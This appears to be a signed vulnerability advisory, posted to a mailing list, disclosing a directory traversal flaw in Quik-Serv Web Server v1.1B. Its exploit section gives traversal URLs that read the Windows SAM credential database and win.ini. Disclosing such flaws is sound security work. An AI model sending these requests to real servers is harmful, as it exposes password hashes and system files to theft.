 |
|
|
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Quik-Serv Web Server v1.1B Arbitrary File Disclosure
Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into
it. The server is vulnerable to a directory transversal which allows
a remote user to display arbitrary files.
Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam
To display the win.ini file
http://server/../../../winnt/win.ini
Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.
Vendor Status:
The vendor has been contacted. But received no reply.
- - - - - --
p0p t4rtz
p0pt4rtz@hotmail.com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPKtxlnZQKziJjiRfEQJ5tACgx8vvxarS1zSVcWTYIvmLlQRtNi4AoNiU
xJfaNBOzgvm5Z+F582bJ9LJr
=hCYD
-----END PGP SIGNATURE-----
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
|
|
|
|
|
|
|
|
